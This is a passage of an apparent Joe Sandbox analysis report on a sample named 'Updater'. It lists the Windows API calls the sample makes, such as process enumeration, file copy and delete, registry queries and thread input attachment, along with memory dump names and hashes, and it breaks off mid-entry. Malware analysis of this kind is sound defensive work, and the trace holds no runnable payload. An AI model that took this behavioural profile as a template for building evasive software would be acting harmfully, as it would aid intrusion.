                                                                                                    • Part of subcall function 006E3B38: SelectObject.GDI32(?,00000000), ref: 006E3BE1
                                                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00769439
                                                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 0076944D
                                                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 0076945B
                                                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 0076946B
                                                                                                  • EndPath.GDI32(?), ref: 0076947B
                                                                                                  • StrokePath.GDI32(?), ref: 0076948B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                  • String ID:
                                                                                                  • API String ID: 43455801-0
                                                                                                  • Opcode ID: 198ac30a1197b9f493acb48c4d4ac444ecebf3d2bbefc55294d3a58b9b9c465c
                                                                                                  • Instruction ID: 3f9623c1a23295d0b044781d12b81e3d50397186851ed0885ef0cd7802064984
                                                                                                  • Opcode Fuzzy Hash: 198ac30a1197b9f493acb48c4d4ac444ecebf3d2bbefc55294d3a58b9b9c465c
                                                                                                  • Instruction Fuzzy Hash: E1111B7250025CBFDF129F94DC88EAA7F6DEB09350F00C011FA1A5A161C7B5AD56DBA4
                                                                                                  APIs
                                                                                                    • Part of subcall function 0149F809: GetKeyboardType.USER32(00000000), ref: 0149F80E
                                                                                                    • Part of subcall function 0149F809: GetKeyboardType.USER32(00000001), ref: 0149F81A
                                                                                                  • GetCommandLineA.KERNEL32 ref: 014A2428
                                                                                                  • GetVersion.KERNEL32 ref: 014A243C
                                                                                                  • GetVersion.KERNEL32 ref: 014A244D
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 014A2489
                                                                                                    • Part of subcall function 0149F839: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F85B
                                                                                                    • Part of subcall function 0149F839: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0149F8AA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F88E
                                                                                                    • Part of subcall function 0149F839: RegCloseKey.ADVAPI32(?,0149F8B1,00000000,?,00000004,00000000,0149F8AA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F8A4
                                                                                                  • GetThreadLocale.KERNEL32 ref: 014A2469
                                                                                                    • Part of subcall function 014A22F9: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,014A235F), ref: 014A231F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3734044017-0
                                                                                                  • Opcode ID: 830eaa0441c967f3b572e54c67b144755ac7df38f0d45f48535cb44bb915c3eb
                                                                                                  • Instruction ID: 3219372fa7230dc73123de8ced63f0c2197662c727a0c297e652a5f2ef9bb3af
                                                                                                  • Opcode Fuzzy Hash: 830eaa0441c967f3b572e54c67b144755ac7df38f0d45f48535cb44bb915c3eb
                                                                                                  • Instruction Fuzzy Hash: 1B012DA1D443838BEB30BFF6A54871C3E61EB31304F95046F84844A2B9E7784015D767
                                                                                                  APIs
                                                                                                  • GetClientRect.USER32(?), ref: 007289FB
                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00728A12
                                                                                                  • GetWindowDC.USER32(?), ref: 00728A1E
                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00728A2D
                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00728A3F
                                                                                                  • GetSysColor.USER32(00000005), ref: 00728A59
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 272304278-0
                                                                                                  • Opcode ID: 9f86360a6b0a28d48517d0b41deedb88ead4f4f89a51327e5c99ac3415da308b
                                                                                                  • Instruction ID: 591ed4edb469d0cb2ab1007f3dceae955257348d15f7117d7b9ac4b2948be9d6
                                                                                                  • Opcode Fuzzy Hash: 9f86360a6b0a28d48517d0b41deedb88ead4f4f89a51327e5c99ac3415da308b
                                                                                                  • Instruction Fuzzy Hash: 0B01BC31901215EFDB609B64EC08BF97BB1FB04320F118161FA16A60A1CF791E91EB16
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00732999
                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 007329A5
                                                                                                  • CloseHandle.KERNEL32(?), ref: 007329AE
                                                                                                  • CloseHandle.KERNEL32(?), ref: 007329B6
                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 007329BF
                                                                                                  • HeapFree.KERNEL32(00000000), ref: 007329C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 146765662-0
                                                                                                  • Opcode ID: 86b7155669ede8b80f09697276ddde540f28a25643b99aeb6bc1835b7ec7acda
                                                                                                  • Instruction ID: 80caea9145a646e84b0b27dbb8759d2af171ef7e7e0c87ce7ab2d120a2bbd743
                                                                                                  • Opcode Fuzzy Hash: 86b7155669ede8b80f09697276ddde540f28a25643b99aeb6bc1835b7ec7acda
                                                                                                  • Instruction Fuzzy Hash: 4FE0ED76614249FBDB111FE2EC0C905BF39FF493217118220F22692170CBB65C20DB55
                                                                                                  APIs
                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007647EA
                                                                                                  • IsMenu.USER32(?), ref: 007647FF
                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00764847
                                                                                                  • DrawMenuBar.USER32 ref: 0076485A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 3076010158-4108050209
                                                                                                  • Opcode ID: 4f4b7db95fe3a6cd84bbdcc1054662f1c4f3193c890892ad2e3276fdd2cbd1bd
                                                                                                  • Instruction ID: c27bbe7e25dc67998f847f01b090f252614932da299e2eafaa9b6e1601f924fd
                                                                                                  • Opcode Fuzzy Hash: 4f4b7db95fe3a6cd84bbdcc1054662f1c4f3193c890892ad2e3276fdd2cbd1bd
                                                                                                  • Instruction Fuzzy Hash: AC416874A0138AEFDF20CF55D894AAABBB9FF85714F048129FD06A7251C738AD50CB94
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                    • Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59
                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00732F15
                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00732F28
                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00732F58
                                                                                                    • Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$_wcslen$ClassName
                                                                                                  • String ID: ComboBox$ListBox
                                                                                                  • API String ID: 2081771294-1403004172
                                                                                                  • Opcode ID: 73778b3c4ee8a8b0baa6392de06ad3a0b9d8bd41f0174fa56c815d5e2997e721
                                                                                                  • Instruction ID: 474f012e35735facd457411f5766bdd23851df346812e9bcb0bc17d5c112e2f2
                                                                                                  • Opcode Fuzzy Hash: 73778b3c4ee8a8b0baa6392de06ad3a0b9d8bd41f0174fa56c815d5e2997e721
                                                                                                  • Instruction Fuzzy Hash: CC212871E00105AEEB14AB74C845DFEB77ADF45360F11821AF816A32E2DB395C0A9660
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F
                                                                                                    • Part of subcall function 00733E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00733EB2
                                                                                                    • Part of subcall function 00733E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733EC3
                                                                                                    • Part of subcall function 00733E94: GetCurrentThreadId.KERNEL32 ref: 00733ECA
                                                                                                    • Part of subcall function 00733E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,0073368B), ref: 00733ED1
                                                                                                  • GetFocus.USER32 ref: 0073404B
                                                                                                  • GetParent.USER32(00000000), ref: 00734068
                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 007340A7
                                                                                                  • EnumChildWindows.USER32(?,00734110), ref: 007340CF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                  • String ID: %s%d
                                                                                                  • API String ID: 1272988791-1110647743
                                                                                                  • Opcode ID: b1ad5a5aecb70c13f788fabb4753f928f3fef3dbf62ca4a8e00847ac9afdf5a1
                                                                                                  • Instruction ID: 415d94c7212cfdbc3ea40216884b2c7270820db4e848b932fc5206aa67992649
                                                                                                  • Opcode Fuzzy Hash: b1ad5a5aecb70c13f788fabb4753f928f3fef3dbf62ca4a8e00847ac9afdf5a1
                                                                                                  • Instruction Fuzzy Hash: 3D21C671B00205ABDF24AF70DC89AF9777AEF84310F0480A5FE0A97243DA796D459BB5
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,014B5ED0), ref: 014B5AEE
                                                                                                  • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 014B5AFB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: C:\temp\$GlobalMemoryStatusEx$kernel32.dll
                                                                                                  • API String ID: 1646373207-1236151733
                                                                                                  • Opcode ID: a2d4609ca4986f11f7348bb38e512ae86bdbc62dbab5a36f054a4891c73db127
                                                                                                  • Instruction ID: 86f42f78634a27f23a851f40e1ccc2b9bb7273f5f63eff43c4ea8cb8e4589ce7
                                                                                                  • Opcode Fuzzy Hash: a2d4609ca4986f11f7348bb38e512ae86bdbc62dbab5a36f054a4891c73db127
                                                                                                  • Instruction Fuzzy Hash: B811E0742083408FC712EF69E9C0999BBE4FB2B220769049BE0088F33AE7748C018F71
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F85B
                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0149F8AA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F88E
                                                                                                  • RegCloseKey.ADVAPI32(?,0149F8B1,00000000,?,00000004,00000000,0149F8AA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F8A4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                  • Opcode ID: a178361f35a4bdcfa78d859ac9ba035e9e416d1428482e2a7ae047d8daf00b63
                                                                                                  • Instruction ID: 9850a7dede8bd8c9bc6355904779c890f50f431bd406d1650afce198402692fd
                                                                                                  • Opcode Fuzzy Hash: a178361f35a4bdcfa78d859ac9ba035e9e416d1428482e2a7ae047d8daf00b63
                                                                                                  • Instruction Fuzzy Hash: EE01B576A00209BAEF11EBD1CC42FAD7BACEB14700F2004A6B900DB694E7745614D754
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006F4C2A,00000003,?,006F4BCA,00000003,00799500,0000000C,006F4D21,00000003,00000002), ref: 006F4C99
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F4CAC
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,006F4C2A,00000003,?,006F4BCA,00000003,00799500,0000000C,006F4D21,00000003,00000002,00000000), ref: 006F4CCF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 27fa94c7479ba2287f3c5c48239c230062ab2b6a98b70bebff952d4a71cb367a
                                                                                                  • Instruction ID: 51520638704544fc8ab0f04253e54c2cf1d30ce20c4685df86ee21c0f43c47eb
                                                                                                  • Opcode Fuzzy Hash: 27fa94c7479ba2287f3c5c48239c230062ab2b6a98b70bebff952d4a71cb367a
                                                                                                  • Instruction Fuzzy Hash: B9F0A430B1020CBBDB259F95DD09BAE7BB6EF04751F004168F90AA6250DB744D40CB84
                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E27DC,?,?,006E058E,?,00000001), ref: 006E291B
                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006E292D
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,006E27DC,?,?,006E058E,?,00000001), ref: 006E293F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                  • API String ID: 145871493-3689287502
                                                                                                  • Opcode ID: 536201be3c9f2107125652427824de4ca6e6f794d0098346726a7c844400e562
                                                                                                  • Instruction ID: ab08f0de1643406727e05aee02671701e8d6c604506dcac291cb592dd8998b09
                                                                                                  • Opcode Fuzzy Hash: 536201be3c9f2107125652427824de4ca6e6f794d0098346726a7c844400e562
                                                                                                  • Instruction Fuzzy Hash: 0AE08631B127232B937117176C1C7AA651B9F97B22B064015F906D6220DBD8CC0284A4
                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,007277B4,?,?,006E058E,?,00000001), ref: 006E28E1
                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006E28F3
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,007277B4,?,?,006E058E,?,00000001), ref: 006E2906
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                  • API String ID: 145871493-1355242751
                                                                                                  • Opcode ID: 5c2abb36ef1c3cfef1e729042d7d6ae034348b39319c7cf0d669b7318dd12218
                                                                                                  • Instruction ID: 77bb1dd4fe7ebd9b08a38ad5ba23471c125f5a1f83b508db56ce1ec80c134e58
                                                                                                  • Opcode Fuzzy Hash: 5c2abb36ef1c3cfef1e729042d7d6ae034348b39319c7cf0d669b7318dd12218
                                                                                                  • Instruction Fuzzy Hash: B8D0C231B23B6F57863227276C18DCB2A1B9F82B1130A4020FC02A6225DFA8CC11C594
                                                                                                  APIs
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0074396B
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 007439ED
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00743A03
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00743A14
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00743A26
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Delete$Copy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3226157194-0
                                                                                                  • Opcode ID: ba450aa4bf1078b631cfe6974d864fe45dbbc868ac33352b7a7889c100448b72
                                                                                                  • Instruction ID: 792f768818427c8bdb3c785f1e2c087609448e71a51322f14bd268c2400e2af0
                                                                                                  • Opcode Fuzzy Hash: ba450aa4bf1078b631cfe6974d864fe45dbbc868ac33352b7a7889c100448b72
                                                                                                  • Instruction Fuzzy Hash: ABB130B1E0111DABDF55DFA4CC85EEEB77EEF48350F0040AAF609A6141DB349B448B65
                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0075AE1F
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0075AE2D
                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0075AE60
                                                                                                  • CloseHandle.KERNEL32(?), ref: 0075B035
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3488606520-0
                                                                                                  • Opcode ID: 3289d2a72c42e90bd6243963f8baf08914b0319a905cc0c9c38c842393084297
                                                                                                  • Instruction ID: 11cce4e40bbbc8e17d1ec7415233009ce54dcce9d0575be8cd2e4ef070de752f
                                                                                                  • Opcode Fuzzy Hash: 3289d2a72c42e90bd6243963f8baf08914b0319a905cc0c9c38c842393084297
                                                                                                  • Instruction Fuzzy Hash: 43A1D171A00301AFD360DF24C892F2AB7E2AF84710F14891DF9599B3D2DBB5ED448B86
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0075B0A4
                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0075B0B2
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 0075B136
                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0075B19E
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0075B1B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1991900642-0
                                                                                                  • Opcode ID: 54e999f4c9b69ba9916602573064b9483fbb81d45c483346e51e0fc2e40c46e4
